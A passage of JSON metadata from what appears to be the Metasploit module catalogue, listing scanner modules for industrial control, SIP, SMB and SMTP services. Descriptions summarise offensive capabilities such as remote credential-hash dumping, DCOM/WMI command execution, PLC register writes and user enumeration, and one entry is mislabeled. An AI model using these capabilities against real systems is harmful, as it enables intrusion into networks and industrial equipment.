"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/scada/modbus_findunitid.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbus_findunitid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/modbusclient": {
"name": "Modbus Client Utility",
"full_name": "auxiliary/scanner/scada/modbusclient",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"EsMnemon <esm@mnemonic.no>",
"Arnaud SOULLIE <arnaud.soullie@solucom.fr>",
"Alexandrine TORRENTS <alexandrine.torrents@eurecom.fr>",
"Mathieu CHEVALIER <mathieu.chevalier@eurecom.fr>"
],
"description": "This module allows reading and writing data to a PLC using the Modbus protocol.\n This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond,\n as well as the mbtget perl script.",
"references": [
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/modbusclient.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbusclient",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/modbusdetect": {
"name": "Modbus Version Scanner",
"full_name": "auxiliary/scanner/scada/modbusdetect",
"rank": 300,
"disclosure_date": "2011-11-01",
"type": "auxiliary",
"author": [
"EsMnemon <esm@mnemonic.no>"
],
"description": "This module detects the Modbus service, tested on a SAIA PCD1.M2 system.\n Modbus is a clear text protocol used in common SCADA systems, developed\n originally as a serial-line (RS232) async protocol, and later transformed to IP,\n which is called ModbusTCP.",
"references": [
"URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx",
"URL-http://en.wikipedia.org/wiki/Modbus:TCP"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/modbusdetect.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbusdetect",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/moxa_discover": {
"name": "Moxa UDP Device Discovery",
"full_name": "auxiliary/scanner/scada/moxa_discover",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrick DeSantis <p@t-r10t.com>"
],
"description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines.\n\n A discovery packet compels a Moxa device to respond to the sender\n with some basic device information that is needed for more advanced\n functions. The discovery data is 8 bytes in length and is the most\n basic example of the Moxa protocol. It may be sent out as a\n broadcast (destination 255.255.255.255) or to an individual device.\n\n Devices that respond to this query may be vulnerable to serious\n information disclosure vulnerabilities, such as CVE-2016-9361.\n\n The module is the work of Patrick DeSantis of Cisco Talos and is\n derived from original work by K. Reid Wightman. Tested and validated\n on a Moxa NPort 6250 with firmware versions 1.13 and 1.15.",
"references": [
"CVE-2016-9361",
"URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/",
"URL-http://www.moxa.com/support/faq/faq_detail.aspx?id=646"
],
"platform": "",
"arch": "",
"rport": 4800,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/moxa_discover.rb",
"is_install_path": true,
"ref_name": "scanner/scada/moxa_discover",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/pcomclient": {
"name": "Unitronics PCOM Client",
"full_name": "auxiliary/scanner/scada/pcomclient",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luis Rosa <lmrosa@dei.uc.pt>"
],
"description": "Unitronics Vision PLCs allow unauthenticated PCOM commands\n to query PLC registers.",
"references": [
"URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf"
],
"platform": "",
"arch": "",
"rport": 20256,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-02-08 19:22:48 +0000",
"path": "/modules/auxiliary/scanner/scada/pcomclient.rb",
"is_install_path": true,
"ref_name": "scanner/scada/pcomclient",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/profinet_siemens": {
"name": "Siemens Profinet Scanner",
"full_name": "auxiliary/scanner/scada/profinet_siemens",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tijl Deneut <tijl.deneut@howest.be>"
],
"description": "This module will use Layer2 packets, known as Profinet Discovery packets,\n to detect all Siemens (and sometimes other) devices on a network.\n It is perfectly SCADA-safe, as there will only be ONE single packet sent out.\n Devices will respond with their IP configuration and hostnames.\n Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be)",
"references": [
"URL-https://wiki.wireshark.org/PROFINET/DCP",
"URL-https://github.com/tijldeneut/ICSSecurityScripts"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/scada/profinet_siemens.rb",
"is_install_path": true,
"ref_name": "scanner/scada/profinet_siemens",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/scada/sielco_winlog_fileaccess": {
"name": "Sielco Sistemi Winlog Remote File Access",
"full_name": "auxiliary/scanner/scada/sielco_winlog_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability\n exists in the Runtime.exe service and can be triggered by sending a specially crafted packet\n to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite\n 2.07.14.",
"references": [
"CVE-2012-4356",
"OSVDB-83275",
"BID-54212",
"EDB-19409",
"URL-http://aluigi.altervista.org/adv/winlog_2-adv.txt"
],
"platform": "",
"arch": "",
"rport": 46824,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/scada/sielco_winlog_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/enumerator": {
"name": "SIP Username Enumerator (UDP)",
"full_name": "auxiliary/scanner/sip/enumerator",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Scan for numeric username/extensions using OPTIONS/REGISTER requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/enumerator.rb",
"is_install_path": true,
"ref_name": "scanner/sip/enumerator",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/enumerator_tcp": {
"name": "SIP Username Enumerator (TCP)",
"full_name": "auxiliary/scanner/sip/enumerator_tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Scan for numeric username/extensions using OPTIONS/REGISTER requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb",
"is_install_path": true,
"ref_name": "scanner/sip/enumerator_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/options": {
"name": "SIP Endpoint Scanner (UDP)",
"full_name": "auxiliary/scanner/sip/options",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for SIP devices using OPTIONS requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/options.rb",
"is_install_path": true,
"ref_name": "scanner/sip/options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/options_tcp": {
"name": "SIP Endpoint Scanner (TCP)",
"full_name": "auxiliary/scanner/sip/options_tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for SIP devices using OPTIONS requests",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/sip/options_tcp.rb",
"is_install_path": true,
"ref_name": "scanner/sip/options_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/sip/sipdroid_ext_enum": {
"name": "SIPDroid Extension Grabber",
"full_name": "auxiliary/scanner/sip/sipdroid_ext_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Anibal Aguiar <anibal.aguiar@gmail.com>"
],
"description": "This module exploits a leak of extension/SIP Gateway\n on SIPDroid 1.6.1 beta, 2.0.1 beta, 2.2 beta (tested in Android 2.1 and 2.2 - official Motorola release)\n (other versions may be affected).",
"references": [
"BID-47710",
"URL-https://seclists.org/fulldisclosure/2011/May/83"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb",
"is_install_path": true,
"ref_name": "scanner/sip/sipdroid_ext_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/impacket/dcomexec": {
"name": "DCOM Exec",
"full_name": "auxiliary/scanner/smb/impacket/dcomexec",
"rank": 300,
"disclosure_date": "2018-03-19",
"type": "auxiliary",
"author": [
"beto",
"Marcello",
"Spencer McIntyre"
],
"description": "A similar approach to psexec but executing commands through DCOM. You\n can select different objects to be used to execute the commands.",
"references": [
"URL-https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/",
"URL-https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/",
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/dcomexec.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py",
"is_install_path": true,
"ref_name": "scanner/smb/impacket/dcomexec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"dcomexec.py"
]
}
},
"auxiliary_scanner/smb/impacket/secretsdump": {
"name": "DCOM Exec",
"full_name": "auxiliary/scanner/smb/impacket/secretsdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Alberto Solino",
"Spencer McIntyre"
],
"description": "Performs various techniques to dump hashes from the remote machine\n without executing any agent there. For SAM and LSA Secrets (including\n cached creds) we try to read as much as we can from the registry and\n then we save the hives in the target system (%SYSTEMROOT%\\Temp dir) and\n read the rest of the data from there.",
"references": [
"URL-https://github.com/gentilkiwi/kekeo/tree/master/dcsync",
"URL-http://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html",
"URL-http://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html",
"URL-http://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html",
"URL-http://www.quarkslab.com/en-blog+read+13",
"URL-https://code.google.com/p/creddump/",
"URL-http://lab.mediaservice.net/code/cachedump.rb",
"URL-http://insecurety.net/?p=768",
"URL-http://www.beginningtoseethelight.org/ntsecurity/index.htm",
"URL-http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf",
"URL-http://www.passcape.com/index.php?section=blog&cmd=details&id=15",
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
"is_install_path": true,
"ref_name": "scanner/smb/impacket/secretsdump",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"secretsdump.py"
]
}
},
"auxiliary_scanner/smb/impacket/wmiexec": {
"name": "WMI Exec",
"full_name": "auxiliary/scanner/smb/impacket/wmiexec",
"rank": 300,
"disclosure_date": "2018-03-19",
"type": "auxiliary",
"author": [
"beto",
"Spencer McIntyre"
],
"description": "A similar approach to psexec but executing commands through WMI.",
"references": [
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
"is_install_path": true,
"ref_name": "scanner/smb/impacket/wmiexec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"wmiexec.py"
]
}
},
"auxiliary_scanner/smb/pipe_auditor": {
"name": "SMB Session Pipe Auditor",
"full_name": "auxiliary/scanner/smb/pipe_auditor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what named pipes are accessible over SMB",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-03-22 06:41:58 +0000",
"path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
"is_install_path": true,
"ref_name": "scanner/smb/pipe_auditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/pipe_dcerpc_auditor": {
"name": "SMB Session Pipe DCERPC Auditor",
"full_name": "auxiliary/scanner/smb/pipe_dcerpc_auditor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what DCERPC services are accessible over a SMB pipe",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
"is_install_path": true,
"ref_name": "scanner/smb/pipe_dcerpc_auditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/psexec_loggedin_users": {
"name": "Microsoft Windows Authenticated Logged In Users Enumeration",
"full_name": "auxiliary/scanner/smb/psexec_loggedin_users",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis @R3dy__ <rdavis@accuvant.com>"
],
"description": "This module uses a valid administrator username and password to enumerate users\n currently logged in, using a technique similar to the \"psexec\" utility provided\n by SysInternals. It uses reg.exe to query the HKU base registry key.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://www.pentestgeek.com/2012/11/05/finding-logged-in-users-metasploit-module/",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
"is_install_path": true,
"ref_name": "scanner/smb/psexec_loggedin_users",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb1": {
"name": "SMBv1 Protocol Detection",
"full_name": "auxiliary/scanner/smb/smb1",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chance Johnson <Chance Johnson @loftwing>"
],
"description": "Detect systems that support the SMBv1 protocol",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-18 15:02:38 +0000",
"path": "/modules/auxiliary/scanner/smb/smb1.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb2": {
"name": "SMB 2.0 Protocol Detection",
"full_name": "auxiliary/scanner/smb/smb2",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect systems that support the SMB 2.0 protocol",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smb/smb2.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enum_gpp": {
"name": "SMB Group Policy Preference Saved Passwords Enumeration",
"full_name": "auxiliary/scanner/smb/smb_enum_gpp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "This module enumerates files from target domain controllers and connects to them via SMB.\n It then looks for Group Policy Preference XML files containing local/domain user accounts\n and passwords and decrypts them using Microsoft's published AES key. This module has been\n tested successfully on a Win2k8 R2 Domain Controller.",
"references": [
"MSB-MS14-025",
"URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)",
"URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html",
"URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx",
"URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-09-10 15:04:22 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enum_gpp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enumshares": {
"name": "SMB Share Enumeration",
"full_name": "auxiliary/scanner/smb/smb_enumshares",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"nebulus",
"sinn3r <sinn3r@metasploit.com>",
"r3dy",
"altonjx"
],
"description": "This module determines what shares are provided by the SMB service and which ones\n are readable/writable. It also collects additional information such as share types,\n directories, files, time stamps, etc.\n\n By default, a netshareenum request is done in order to retrieve share information,\n but if this fails, you may also fall back to SRVSVC.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumshares",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enumusers": {
"name": "SMB User Enumeration (SAM EnumUsers)",
"full_name": "auxiliary/scanner/smb/smb_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what local users exist via the SAM RPC service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_enumusers_domain": {
"name": "SMB Domain User Enumeration",
"full_name": "auxiliary/scanner/smb/smb_enumusers_domain",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"natron <natron@metasploit.com>",
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "Determine what domain users are logged into a remote system via a DCERPC call to NetWkstaUserEnum.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/aa370669%28VS.85%29.aspx"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumusers_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_login": {
"name": "SMB Login Check Scanner",
"full_name": "auxiliary/scanner/smb/smb_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module will test an SMB login on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database, this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0506"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_lookupsid": {
"name": "SMB SID User Enumeration (LookupSid)",
"full_name": "auxiliary/scanner/smb/smb_lookupsid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what users exist via brute force SID lookups.\n This module can enumerate both local and domain accounts by setting\n ACTION to either LOCAL or DOMAIN",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_lookupsid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_ms17_010": {
"name": "MS17-010 SMB RCE Detection",
"full_name": "auxiliary/scanner/smb/smb_ms17_010",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Sean Dillon <sean.dillon@risksense.com>",
"Luke Jennings"
],
"description": "Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.",
"references": [
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0146",
"CVE-2017-0147",
"CVE-2017-0148",
"MSB-MS17-010",
"URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
"URL-https://github.com/countercept/doublepulsar-detection-script",
"URL-https://technet.microsoft.com/en-us/library/security/ms17-010.aspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_ms17_010",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"DOUBLEPULSAR",
"ETERNALBLUE"
]
}
},
"auxiliary_scanner/smb/smb_uninit_cred": {
"name": "Samba _netr_ServerPasswordSet Uninitialized Credential State",
"full_name": "auxiliary/scanner/smb/smb_uninit_cred",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Richard van Eeden",
"sleepya",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module checks whether a Samba target is vulnerable to the _netr_ServerPasswordSet uninitialized credential state vulnerability (CVE-2015-0240).",
"references": [
"CVE-2015-0240",
"OSVDB-118637",
"URL-https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/",
"URL-https://gist.github.com/worawit/33cc5534cb555a0b710b",
"URL-https://www.nccgroup.com/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_uninit_cred",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smb/smb_version": {
"name": "SMB Version Detection",
"full_name": "auxiliary/scanner/smb/smb_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Display version information about each system",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-05-07 00:13:11 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_version.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_enum": {
"name": "SMTP User Enumeration Utility",
"full_name": "auxiliary/scanner/smtp/smtp_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder@alligatorteam.org>",
"nebulus"
],
"description": "The SMTP service has two internal commands that allow the enumeration\n of users: VRFY (confirming the names of valid users) and EXPN (which\n reveals the actual addresses behind user aliases and mailing lists).\n Servers that implement these SMTP commands can\n reveal a list of valid users.",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt",
"OSVDB-12551",
"CVE-1999-0531"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_ntlm_domain": {
"name": "SMTP NTLM Domain Extraction",
"full_name": "auxiliary/scanner/smtp/smtp_ntlm_domain",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Whitcroft <rwhitcroft@digitalboundary.net>"
],
"description": "Extract the Windows domain name from an SMTP NTLM challenge.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/cc246870.aspx"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_ntlm_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_relay": {
"name": "SMTP Open Relay Detection",
"full_name": "auxiliary/scanner/smtp/smtp_relay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Campbell Murray",
"xistence <xistence@0x90.nl>"
],
"description": "This module tests if an SMTP server will accept (via a 250 response code)\n an e-mail for relaying, using a variety of testing methods.\n Some of the extended methods try to abuse configuration or mail server flaws.",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt",
"URL-https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_relay",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/smtp/smtp_version": {
"name": "SMTP Banner Grabber",
"full_name": "auxiliary/scanner/smtp/smtp_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
